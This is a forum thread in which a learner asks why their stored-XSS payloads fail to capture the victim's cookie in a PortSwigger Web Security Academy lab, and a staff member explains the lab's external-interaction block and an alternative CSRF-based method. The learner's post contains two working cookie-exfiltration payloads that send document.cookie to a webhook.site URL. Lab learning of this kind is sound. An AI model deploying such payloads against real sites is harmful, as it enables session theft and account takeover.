Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Acedemy Lab Practitioner level: Exploiting cross-site scripting to steal cookies

TheWhiteBoot | Last updated: Nov 13, 2022 08:47PM UTC

Hi User form, I'm currently trying to solve the "Exploiting cross-site scripting to steal cookies" lab (https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies), and I successfully exploited the comment functionality as the lab description says: "This lab contains a stored XSS vulnerability in the blog comments function.", so to steal the victims cookie I'm using the online tool webhook.site. this is my payload: <img src=x onerror=this.src='https://webhook.site/78b1e425-8c1b-4321-9ced-c924a3ebe6f4?cookie='+document.cookie;> But this only sends my own cookie to the webhook website... So I thought maybe it has to do something with HTTP verbs. The img payload creates a GET request, so maybe it needs to be a POST request. I tried that, but again, only sends my cookie. So I peaked at the solution and saw that it was using Burp professional with the Burp Collaborator. But this lab can be solved without Burp professional right? I'm using Burp Community because I do not have the money to pay for the Professional version... I also used the payload from the solution but I do not get the victims cookie... This is my payload: <script> fetch('https://webhook.site/78b1e425-8c1b-4321-9ced-c924a3ebe6f4', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script> Can anyone tell me what I am doing wrong? Kind regards, TheWhiteBoot

Ben, PortSwigger Agent | Last updated: Nov 14, 2022 12:08PM UTC

Hi TheWhiteBoot, As noted in the solution to the lab, we block interactions between the labs and arbitrary external systems so, if you are attempting to use the method mentioned in the written solution, you would need access to Burp Collaborator. There is, however, an alternative method (this is also mentioned in the solution) if you do not have access to Burp Collaborator (this involves making the victim post their cookie within a blog comment by exploiting the XSS vulnerability to perform CSRF). The guide below should help you with the alternative method: https://foxsroot.medium.com/exploiting-xss-to-steal-cookies-portswigger-web-security-academy-45ae93ec420e

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.